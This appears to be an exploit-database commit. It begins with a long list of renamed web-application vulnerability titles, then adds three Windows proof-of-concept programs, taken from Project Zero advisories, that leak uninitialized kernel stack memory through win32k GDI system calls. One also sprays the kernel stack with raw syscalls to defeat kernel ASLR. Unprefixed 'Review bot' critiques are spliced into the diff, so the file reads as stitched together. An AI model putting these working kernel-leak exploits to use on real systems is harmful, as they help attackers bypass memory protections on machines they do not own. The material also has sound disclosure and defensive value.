4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections Mambo Component Docman 1.3.0 - Multiple SQL Injection Mambo Component Docman 1.3.0 - Multiple SQL Injections ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections Paliz Portal - Cross-Site Scripting / Multiple SQL Injection Paliz Portal - Cross-Site Scripting / Multiple SQL Injections Sphider 1.3.x - Admin Panel 
Multiple SQL Injection Sphider 1.3.x - Admin Panel Multiple SQL Injections Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injections Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injection Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injections EasyGallery 5 - 'index.php' Multiple SQL Injection EasyGallery 5 - 'index.php' Multiple SQL Injections Xenon - 'id' Parameter Multiple SQL Injection Xenon - 'id' Parameter Multiple SQL Injections eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections Dolibarr ERP/CRM - /user/index.php Multiple Parameter SQL Injection Dolibarr ERP/CRM - /user/info.php id Parameter SQL Injection Dolibarr ERP/CRM - /admin/boxes.php rowid Parameter SQL Injection Dolibarr ERP/CRM - '/user/index.php' Multiple Parameter SQL Injections Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection PrestaShop 1.4.4.1 - /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Parameter Cross-Site Scripting Manx 1.0.1 - /admin/admin_blocks.php Filename Parameter Traversal Arbitrary File Access Manx 1.0.1 - /admin/admin_pages.php Filename Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access Manx 1.0.1 - 
'/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections Balero CMS 0.7.2 - Multiple Blind SQL Injection Balero CMS 0.7.2 - Multiple Blind SQL Injections WordPress Plugin'WP Mobile Edition 2.7 - Remote File Disclosure WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/blogs.php nb Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/comments.php Multiple Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/plugin.php page Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting PHP Designer 2007 - Personal Multiple SQL Injection PHP Designer 2007 Personal - Multiple SQL Injections WordPress Plugin All-in-One Event Calendar 1.4 agenda-widget.php 
Multiple Parameter Cross-Site Scripting WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Parameter Cross-Site Scripting XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter Cross-Site Scripting XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter Cross-Site Scripting XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Parameter Cross-Site Scripting XM Forum - 'id' Parameter Multiple SQL Injection XM Forum - 'id' Parameter Multiple SQL Injections AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple Parameter SQL Injections Classified Ads Script PHP - 'admin.php' Multiple SQL Injection Classified Ads Script PHP - 'admin.php' Multiple SQL Injections Limny - 'index.php' Multiple SQL Injection Limny - 'index.php' Multiple SQL Injections TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection jCore - /admin/index.php path Parameter Cross-Site Scripting jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting Netsweeper 4.0.8 - SQL Injection Authentication Bypass Netsweeper 4.0.8 - SQL Injection / Authentication Bypass dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injections MantisBT 1.2.19 - Host Header Attack MantisBT 1.2.19 - Host Header Exploit WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting WordPress Plugin RokBox Plugin - 
'/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - /webmail/x3/mail/clientconf.html acct Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter Cross-Site Scripting ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Parameter Cross-Site Scripting PHP Address Book - /addressbook/register/delete_user.php id Parameter SQL Injection PHP Address Book - /addressbook/register/edit_user.php id Parameter SQL Injection PHP Address Book - /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/linktick.php site Parameter SQL Injection PHP Address Book - /addressbook/register/reset_password.php Multiple Parameter 
SQL Injection PHP Address Book - /addressbook/register/reset_password_save.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection PHP Address Book - /addressbook/register/traffic.php var Parameter SQL Injection PHP Address Book - /addressbook/register/user_add_save.php email Parameter SQL Injection PHP Address Book - /addressbook/register/checklogin.php 'Username' Parameter SQL Injection PHP Address Book - /addressbook/register/admin_index.php q Parameter SQL Injection PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection PHP Address Book - '/addressbook/register/reset_password.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection Hero Framework - /users/login 'Username' Parameter Cross-Site Scripting Hero Framework - /users/forgot_password error Parameter Cross-Site Scripting Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections NetApp 
OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Parameter Cross-Site Scripting Jahia xCM - /engines/manager.jsp site Parameter Cross-Site Scripting Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery D-Link DIR-816L Wireless Router - Cross-Site Request Forgery Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injections NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution NeoBill - '/install/include/solidstate.php' Multiple Parameter SQL Injection C2C Forward Auction Creator 2.0 - /auction/asp/list.asp pa Parameter SQL Injection C2C Forward Auction Creator - /auction/casp/Admin.asp SQL Injection Admin Authentication Bypass C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass) Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injections / Authentication Bypass Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection Command School Student Management System - /sw/admin_terms.php id 
Parameter SQL Injection Command School Student Management System - /sw/admin_school_years.php id Parameter SQL Injection Command School Student Management System - /sw/admin_sgrades.php id Parameter SQL Injection Command School Student Management System - /sw/admin_media_codes_1.php id Parameter SQL Injection Command School Student Management System - /sw/admin_infraction_codes.php id Parameter SQL Injection Command School Student Management System - /sw/admin_generations.php id Parameter SQL Injection Command School Student Management System - /sw/admin_relations.php id Parameter SQL Injection Command School Student Management System - /sw/admin_titles.php id Parameter SQL Injection Command School Student Management System - /sw/health_allergies.php id Parameter SQL Injection Command School Student Management System - /sw/admin_school_names.php id Parameter SQL Injection Command School Student Management System - /sw/admin_subjects.php id Parameter SQL Injection Command School Student Management System - /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure Command School Student Management System - /sw/Admin_change_Password.php Cross-Site Request Forgery (Admin Password Manipulation) Command School Student Management System - /sw/add_topic.php Cross-Site Request Forgery (Topic Creation) Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection Command School Student Management System - 
'/sw/admin_generations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation) Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation) Dredge School Administration System - /DSM/loader.php Id Parameter SQL Injection Dredge School Administration System - /DSM/loader.php Account Information Disclosure Dredge School Administration System - /DSM/loader.php Cross-Site Request Forgery (Admin Account Manipulation) Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation) Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection UAEPD Shopping Script - /news.php id Parameter SQL Injection UAEPD Shopping Script - '/products.php' Multiple Parameter SQL Injection UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection BloofoxCMS - /bloofox/index.php 
'Username' Parameter SQL Injection BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin) BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin) Professional Designer E-Store - 'id' Parameter Multiple SQL Injection GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injection Professional Designer E-Store - 'id' Parameter Multiple SQL Injections GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal Xangati - /servlet/Installer file Parameter Directory Traversal Xangati - '/servlet/MGConfigData' Multiple Parameter Directory Traversal Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal Caldera - /costview2/jobs.php tr Parameter SQL Injection Caldera - /costview2/printers.php tr Parameter SQL Injection Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injection WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injections ol-commerce - /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection OL-Commerce - 
'/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections Multiple Netgear Routers - Password Disclosure Multiple NETGEAR Routers - Password Disclosure WebKit - Stealing Variables via Page Navigation in FrameLoader::clear WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear'
This commit is contained in:
parent
df0343af6d
commit
86f822c557
12 changed files with 2091 additions and 715 deletions
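--- /dev/null
+++ b/platforms/windows/dos/42223.cpp
@@ -0,0 +1,81 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1178
+
+We have discovered that it is possible to disclose portions of uninitialized kernel stack memory in Windows 7-10 through the win32k!NtGdiExtGetObjectW system call (accessible via a documented GetObject() API function) to user-mode applications.
+
+The reason for this seems to be as follows: logical fonts in Windows are described by the LOGFONT structure [1]. One of the structure's fields is lfFaceName, a 32-character array containing the typeface name. Usually when logical fonts are created (e.g. with the CreateFont() or CreateFontIndirect() user-mode functions), a large part of the array remains uninitialized, as most font names are shorter than the maximum length. For instance, the CreateFont() API only copies the relevant string up until \0, and leaves the rest of its local LOGFONT structure untouched. In case of CreateFontIndirect(), it is mostly up to the caller to make sure there are no leftover bytes in the structure, but we expect this is rarely paid attention to. The structure is then copied to kernel-mode address space, but can be read back using the GetObject() function, provided that the program has a GDI handle to the logical font.
+
+Now, it turns out that the trailing, uninitialized bytes of the LOGFONT structure for some of the stock fonts contain left-over kernel stack data, which include kernel pointers, among other potentially interesting information. An example output of the attached proof-of-concept program (which obtains and displays the LOGFONT of the DEVICE_DEFAULT_FONT stock font) started on Windows 7 32-bit is as follows:
+
+--- cut ---
+00000000: 10 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 ................
+00000010: bc 02 00 00 00 00 00 ee 01 02 02 22 53 00 79 00 ..........."S.y.
+00000020: 73 00 74 00 65 00 6d 00 00 00 29 92 24 86 6d 81 s.t.e.m...).$.m.
+00000030: fb 4d f2 ad fe ff ff ff 63 76 86 81 76 79 86 81 .M......cv..vy..
+00000040: 10 38 c7 94 02 00 00 00 00 00 00 00 01 00 00 00 .8..............
+00000050: d0 03 69 81 10 38 c7 94 04 7a 00 00 ?? ?? ?? ?? ..i..8...z......
+--- cut ---
+
+After the "System" unicode string, we can observe data typical to a function stack frame: a _EH3_EXCEPTION_REGISTRATION structure at offset 0x28:
+
+.Next = 0x9229???? (truncated)
+.ExceptionHandler = 0x816d8624
+.ScopeTable = 0xadf24dfb
+.TryLevel = 0xfffffffe
+
+as well as pointers to the ntoskrnl.exe kernel image (0x81867663, 0x81867976, 0x816903d0) and paged pool (0x94c73810). This information is largely useful for local attackers seeking to defeat the kASLR exploit mitigation, and the bug might also allow disclosing other sensitive data stored in the kernel address space. We have confirmed that more data can be easily leaked by querying other stock fonts. It is unclear whether disclosing junk stack data from other user-mode processes which create logical fonts is possible, but this scenario should also be investigated and addressed if necessary.
+*/
+
+#include <Windows.h>
+#include <cstdio>
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+int main() {
+// Get a handle to the stock font.
+HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT);
+if (hfont == NULL) {
+printf("GetCurrentObject failed\n");
+return 1;
+}
+
+// Zero-out the logfont memory to prevent any artifacts in the output.
+LOGFONT logfont;
+RtlZeroMemory(&logfont, sizeof(logfont));
+
+// Trigger the bug.
+if (GetObject(hfont, sizeof(logfont), &logfont) == 0) {
+printf("GetObject failed\n");
+DeleteObject(hfont);
+return 1;
+}
+
+// Dump the output on screen.
+PrintHex((PBYTE)&logfont, sizeof(logfont));
+
+return 0;
+}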
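Review bot: The failure message on the GetStockObject() path names an API the PoC never calls — `printf("GetCurrentObject failed\n");` in main() should read `printf("GetStockObject failed\n");`, otherwise anyone reproducing a failure is sent looking for the wrong call. The `DeleteObject(hfont)` on the GetObject() failure path is unnecessary for a stock-object handle and is also not mirrored on the success path, so the two exits are inconsistent; dropping it keeps them symmetric. It is also worth stating in the header comment that the dump covers sizeof(LOGFONT), which under a UNICODE build is LOGFONTW, since that is why the sample dump ends at offset 0x5c and why the face name appears as wide characters.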
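--- /dev/null
+++ b/platforms/windows/dos/42224.cpp
@@ -0,0 +1,117 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1179
+
+We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7-10 through the win32k!NtGdiGetOutlineTextMetricsInternalW system call.
+
+The system call returns an 8-byte structure back to ring-3 through the 4th parameter, as evidenced by the following assembly code (win32k.sys from Windows 7 32-bit):
+
+--- cut ---
+.text:BF87364A mov edx, [ebp+arg_C]
+.text:BF87364D lea ecx, [edx+8]
+.text:BF873650 mov eax, _W32UserProbeAddress
+.text:BF873655 cmp ecx, eax
+.text:BF873657 ja short loc_BF873662
+.text:BF873659 cmp ecx, edx
+.text:BF87365B jbe short loc_BF873662
+.text:BF87365D test dl, 3
+.text:BF873660 jz short loc_BF873665
+.text:BF873662
+.text:BF873662 loc_BF873662:
+.text:BF873662 mov byte ptr [eax], 0
+.text:BF873665
+.text:BF873665 loc_BF873665:
+.text:BF873665 lea esi, [ebp+var_24]
+.text:BF873668 mov edi, edx
+.text:BF87366A movsd
+.text:BF87366B movsd
+--- cut ---
+
+However, according to our experiments, only the first 4 bytes of the source structure (placed on the kernel stack) are initialized under normal circumstances, while the other 4 bytes are set to leftover data. In order to demonstrate the issue, we have created a proof-of-concept program which sprays 1024 bytes of the kernel stack with a 0x41 ('A') byte directly prior to triggering the vulnerability, with the help of the win32k!NtGdiEngCreatePalette system call. Then, the DWORD leaked via the discussed vulnerability is indeed equal to 0x41414141, as evidenced by the PoC output:
+
+--- cut ---
+C:\>NtGdiGetOutlineTextMetricsInternalW_stack.exe
+Data read: 41414141
+--- cut ---
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <cstdio>
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+// Own implementation of memset(), which guarantees no data is spilled on the local stack.
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+for (ULONG i = 0; i < size; i++) {
+ptr[i] = byte;
+}
+}
+
+VOID SprayKernelStack() {
+// Windows 7 32-bit.
+CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
+
+// Buffer allocated in static program memory, hence doesn't touch the local stack.
+static BYTE buffer[1024];
+
+// Fill the buffer with 'A's and spray the kernel stack.
+MyMemset(buffer, 'A', sizeof(buffer));
+SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
+
+// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+// Windows 7 32-bit.
+CONST ULONG __NR_NtGdiGetOutlineTextMetricsInternalW = 0x10c6;
+
+// Create a Device Context.
+HDC hdc = CreateCompatibleDC(NULL);
+
+// Create a TrueType font.
+HFONT hfont = CreateFont(10, // nHeight
+10, // nWidth
+0, // nEscapement
+0, // nOrientation
+FW_DONTCARE, // fnWeight
+FALSE, // fdwItalic
+FALSE, // fdwUnderline
+FALSE, // fdwStrikeOut
+ANSI_CHARSET, // fdwCharSet
+OUT_DEFAULT_PRECIS, // fdwOutputPrecision
+CLIP_DEFAULT_PRECIS, // fdwClipPrecision
+DEFAULT_QUALITY, // fdwQuality
+FF_DONTCARE, // fdwPitchAndFamily
+L"Times New Roman");
+
+// Select the font into the DC.
+SelectObject(hdc, hfont);
+
+// Spray the kernel stack to get visible results.
+SprayKernelStack();
+
+// Read the 4 uninitialized kernel stack bytes and print them on screen.
+DWORD output[2] = { /* zero padding */ };
+if (!SystemCall32(__NR_NtGdiGetOutlineTextMetricsInternalW, hdc, 0, NULL, output)) {
+printf("NtGdiGetOutlineTextMetricsInternalW failed\n");
+DeleteObject(hfont);
+DeleteDC(hdc);
+return 1;
+}
+
+printf("Data read: %x\n", output[1]);
+
+// Free resources.
+DeleteObject(hfont);
+DeleteDC(hdc);
+
+return 0;
+}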
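Review bot: The font is deleted while it is still selected into hdc on both exit paths of main(), because the previous object returned by SelectObject() is discarded; keep it with `HGDIOBJ hold = SelectObject(hdc, hfont);` and restore it with `SelectObject(hdc, hold);` before each `DeleteObject(hfont);`. Neither CreateCompatibleDC() nor CreateFont() is checked, so a NULL hfont would leave the DC's default font selected and the syscall would silently probe a different object than the one described in the header. The service numbers 0x129c and 0x10c6 and the raw `int 0x2e` entry are tied to Windows 7 x86, as the local comments say; on any other build they dispatch to some other service, so the header comment should state that restriction up front rather than leaving it to the two inline comments. SystemCall32() also has no return statement and relies on eax surviving from the interrupt, which is an MSVC 32-bit inline-assembly assumption worth noting next to the function.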
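--- /dev/null
+++ b/platforms/windows/dos/42225.cpp
@@ -0,0 +1,91 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1180
+
+We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other systems untested) through the win32k!NtGdiGetTextMetricsW system call.
+
+The output structure used by the syscall, according to various sources, is TMW_INTERNAL, which wraps the TEXTMETRICW and TMDIFF structures (see e.g. the PoC for issue #480 ). The disclosure occurs when the service is called against a Device Context with one of the stock fonts selected (we're using DEVICE_DEFAULT_FONT). Then, we can find 7 uninitialized kernel stack bytes at offsets 0x39-0x3f of the output buffer. An example output of the attached proof-of-concept program started on Windows 7 32-bit is as follows:
+
+--- cut ---
+00000000: 10 00 00 00 0d 00 00 00 03 00 00 00 03 00 00 00 ................
+00000010: 00 00 00 00 07 00 00 00 0f 00 00 00 bc 02 00 00 ................
+00000020: 00 00 00 00 60 00 00 00 60 00 00 00 20 00 22 21 ....`...`... ."!
+00000030: ac 20 20 00 00 00 00 21 ee[03 81 ff 35 64 36 8f]. ....!....5d6.
+00000040: 20 ff 80 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? .. ............
+--- cut ---
+
+Here, the leaked bytes are "03 81 ff 35 64 36 8f". If we map the 0x39-0x3f offsets to the layout of the TMW_INTERNAL structure, it turns out that the 7 bytes in question correspond to the 3 alignments bytes past the end of TEXTMETRICSW (which itself has an odd length of 57 bytes), and the first 4 bytes of the TMDIFF structure.
+
+Triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <cstdio>
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+int main() {
+// Windows 7 32-bit.
+CONST ULONG __NR_NtGdiGetTextMetricsW = 0x10d9;
+
+// Create a Device Context.
+HDC hdc = CreateCompatibleDC(NULL);
+
+// Get a handle to the stock font.
+HFONT hfont = (HFONT)GetStockObject(DEVICE_DEFAULT_FONT);
+if (hfont == NULL) {
+printf("GetCurrentObject failed\n");
+return 1;
+}
+
+// Select the font into the DC.
+SelectObject(hdc, hfont);
+
+// Trigger the vulnerability and dump the kernel output on stdout.
+BYTE output[0x44] = { /* zero padding */ };
+if (!SystemCall32(__NR_NtGdiGetTextMetricsW, hdc, output, sizeof(output))) {
+printf("NtGdiGetTextMetricsW failed\n");
+DeleteObject(hfont);
+DeleteDC(hdc);
+return 1;
+}
+
+PrintHex(output, sizeof(output));
+
+// Free resources.
+DeleteObject(hfont);
+DeleteDC(hdc);
+
+return 0;
+}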
